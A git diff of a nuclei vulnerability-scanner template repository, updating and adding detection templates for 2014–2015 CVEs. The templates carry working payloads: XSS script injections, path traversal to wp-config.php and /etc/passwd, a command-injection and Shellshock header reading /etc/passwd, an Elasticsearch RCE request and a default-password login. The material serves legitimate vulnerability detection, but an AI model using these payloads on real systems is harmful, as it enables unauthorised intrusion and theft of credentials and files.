a/nuclei-templates/CVE-2014/CVE-2014-9094.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2014-9094 -info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting - author: daffainfo - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9119.yaml b/nuclei-templates/CVE-2014/CVE-2014-9119.yaml index eea1760029..7f9333b458 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9119.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9119.yaml @@ -3,22 +3,35 @@ id: CVE-2014-9119 info: name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + impact: | + Allows an attacker to read arbitrary files on the server. + remediation: | + Update WordPress DB Backup plugin to version 4.6 or higher. reference: - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - https://www.exploit-db.com/exploits/35378 - https://nvd.nist.gov/vuln/detail/CVE-2014-9119 - https://wpvulndb.com/vulnerabilities/7726 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb + epss-score: 0.11639 + epss-percentile: 0.95149 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: db_backup_project + product: db_backup + framework: wordpress + tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' @@ -35,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/05 +# digest: 490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-9180.yaml b/nuclei-templates/CVE-2014/CVE-2014-9180.yaml index 1e5f5efc3e..faf2b9414d 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9180.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9180.yaml @@ -12,16 +12,20 @@ info: - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2014-9180 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N - cvss-score: 5.0 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 + epss-score: 0.00285 + epss-percentile: 0.6809 + cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true - product: eleanor_cms + max-request: 1 vendor: eleanor-cms + product: eleanor_cms shodan-query: html:"eleanor" - tags: cve,cve2014,eleanor,cms,redirect + tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: - method: GET @@ -33,3 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-9444.yaml b/nuclei-templates/CVE-2014/CVE-2014-9444.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9444.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9444.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9606.yaml b/nuclei-templates/CVE-2014/CVE-2014-9606.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9606.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9606.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9607.yaml b/nuclei-templates/CVE-2014/CVE-2014-9607.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9607.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9607.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9608.yaml b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9608.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9608.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml index 0f3b8b89a7..19acbf289c 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-9614.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-9614.yaml @@ -1,19 +1,20 @@ id: CVE-2014-9614 + info: name: Netsweeper 4.0.5 - Default Weak Account author: daffainfo severity: critical - description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9614 - - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2014-9614 cwe-id: CWE-798 tags: cve,cve2021,netsweeper,default-login + requests: - raw: - | @@ -23,20 +24,21 @@ requests: Referer: {{BaseURL}}/webadmin/start/ login=branding&password=branding&Submit=Login + matchers-condition: and matchers: - type: status status: - 302 + - type: word part: header words: - 'Location: ../common/' - 'Location: ../start/' condition: or + - type: word part: header words: - 'Set-Cookie: webadminU=' - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-9617.yaml b/nuclei-templates/CVE-2014/CVE-2014-9617.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9617.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9617.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9618.yaml b/nuclei-templates/CVE-2014/CVE-2014-9618.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9618.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9618.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-1203.yaml b/nuclei-templates/CVE-2014/cve-2014-1203.yaml new file mode 100644 index 0000000000..ac36dc0e9f --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-1203.yaml @@ -0,0 +1,51 @@ +id: CVE-2014-1203 + +info: + name: Eyou E-Mail <3.6 - Remote Code Execution + author: pikpikcu + severity: critical + description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 + - http://seclists.org/fulldisclosure/2014/Jan/32 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-1203 + cwe-id: CWE-77 + epss-score: 0.02045 + epss-percentile: 0.88732 + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: eyou + product: eyou + tags: cve2014,cve,seclists,rce,eyou + +http: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2383.yaml rename to nuclei-templates/CVE-2014/cve-2014-2383.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-2908.yaml b/nuclei-templates/CVE-2014/cve-2014-2908.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-2908.yaml rename to nuclei-templates/CVE-2014/cve-2014-2908.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml index 875767dcaf..2e3eb0f6e1 100644 --- a/nuclei-templates/CVE-2014/cve-2014-3120.yaml +++ b/nuclei-templates/CVE-2014/cve-2014-3120.yaml @@ -1,14 +1,16 @@ -id: cve-2014-3120 +id: CVE-2014-3120 + info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu severity: critical description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - tags: cve,cve2014,elastic,rce + tags: cve,cve2014,elastic,rce,elasticsearch + requests: - raw: - | @@ -16,10 +18,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "size": 1, @@ -37,16 +36,19 @@ requests: } } } + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml b/nuclei-templates/CVE-2014/cve-2014-3704.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-3704.yaml rename to nuclei-templates/CVE-2014/cve-2014-3704.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4513.yaml b/nuclei-templates/CVE-2014/cve-2014-4513.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-4513.yaml rename to nuclei-templates/CVE-2014/cve-2014-4513.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml b/nuclei-templates/CVE-2014/cve-2014-4535.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-4535.yaml rename to nuclei-templates/CVE-2014/cve-2014-4535.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4536.yaml b/nuclei-templates/CVE-2014/cve-2014-4536.yaml new file mode 100644 index 0000000000..d226a920db --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-4536.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/cve-2014-4942.yaml b/nuclei-templates/CVE-2014/cve-2014-4942.yaml index f3a59d9039..bfad79553c 100644 --- a/nuclei-templates/CVE-2014/cve-2014-4942.yaml +++ b/nuclei-templates/CVE-2014/cve-2014-4942.yaml @@ -3,21 +3,35 @@ id: CVE-2014-4942 info: name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + impact: | + An attacker can gain sensitive information from the target system. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + epss-score: 0.01024 + epss-percentile: 0.82199 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: levelfourdevelopment + product: wp-easycart + framework: wordpress + tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" @@ -41,5 +55,4 @@ requests: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/09/30 +# digest: 490a004630440220342dce47a8408c74a401ff37d16e9bdac22e456deb97b98dd0c3c7b4b7daed5702206190335d1ce1d1991a9d8e91c114329267ce0095e548d99dd945e381ab003da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-6271.yaml b/nuclei-templates/CVE-2014/cve-2014-6271.yaml new file mode 100644 index 0000000000..6c5db06412 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-6271.yaml @@ -0,0 +1,44 @@ +id: CVE-2014-6271 + +info: + name: Shellshock + author: pentest_swissky + severity: critical + description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications + reference: + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A + tags: cve,cve2014,rce + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-8682.yaml rename to nuclei-templates/CVE-2014/cve-2014-8682.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9094.yaml b/nuclei-templates/CVE-2014/cve-2014-9094.yaml new file mode 100644 index 0000000000..8e73d7da9b --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-9094.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9615.yaml b/nuclei-templates/CVE-2014/cve-2014-9615.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-9615.yaml rename to nuclei-templates/CVE-2014/cve-2014-9615.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml index d3f55c2a08..99fd990224 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml @@ -6,18 +6,32 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Update to the latest version of the plugin. reference: - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005 - http://www.vapidlabs.com/advisory.php?v=142 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + epss-score: 0.047 + epss-percentile: 0.92455 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: candidate-application-form_project + product: candidate-application-form + framework: wordpress + tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' @@ -31,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/21 +# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml index 20be79142a..9dd8f9e6f7 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml @@ -6,6 +6,10 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. + remediation: | + Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543 @@ -15,10 +19,18 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000010 - cwe-id: CWE-22 - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + cwe-id: CWE-284 + epss-score: 0.03171 + epss-percentile: 0.90143 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: simple-image-manipulator_project + product: simple-image-manipulator + framework: wordpress + tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 490a0046304402204897681607efd5efa7419b4414d554d537b647ee8f3b82b28b5eb82cbf6b94780220070696d15d7aa49a984ce8ead0fd4ccbaa176cc380998024f33878546e311041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-1579.yaml b/nuclei-templates/CVE-2015/CVE-2015-1579.yaml index bf648b2a35..8b1cbf521f 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1579.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1579.yaml @@ -3,30 +3,43 @@ id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x - severity: high + severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + impact: | + An attacker can read arbitrary files on the server, potentially exposing sensitive information. + remediation: | + Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 + - https://wpvulndb.com/vulnerabilities/7540 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 + epss-score: 0.90145 + epss-percentile: 0.9855 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: + max-request: 2 + vendor: elegant_themes + product: divi + framework: wordpress google-query: inurl:/wp-content/plugins/revslider - tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 + tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -40,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1880.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1880.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-20067.yaml b/nuclei-templates/CVE-2015/CVE-2015-20067.yaml index ecb635698b..63f8969bfe 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-20067.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-20067.yaml @@ -13,16 +13,23 @@ info: - https://packetstormsecurity.com/files/132693/ - https://seclists.org/fulldisclosure/2015/Jul/73 - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 + - https://github.com/ARPSyndicate/cvemon classification: - cve-id: CVE-2015-20067 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cwe-id: 862 + cve-id: CVE-2015-20067 + cwe-id: CWE-862 + epss-score: 0.07226 + epss-percentile: 0.93884 + cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: wp_attachment_export_project + product: wp_attachment_export + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export http: - method: GET @@ -38,4 +45,4 @@ http: - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and -# digest: 4b0a00483046022100c3094b36bbe20fa181efa0ebb7100749ad77eb38a7c0c266f48d485931e8dbdc022100cdc3319af15d2f35ebdfcbe5c99e0304b65e039dd2108b84e5d010ef48ad9285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2068.yaml b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml index 8317dbb2ab..592e896cfa 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2068.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml @@ -1,4 +1,5 @@ id: CVE-2015-2068 + info: name: Magento Server Magmi Plugin - Cross Site Scripting author: daffainfo @@ -7,24 +8,25 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-2068 tags: cve,cve2015,magento,magmi,xss,plugin + requests: - method: GET path: - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-2196.yaml b/nuclei-templates/CVE-2015/CVE-2015-2196.yaml index 1d72518aff..2e0903f253 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2196.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2196.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site. 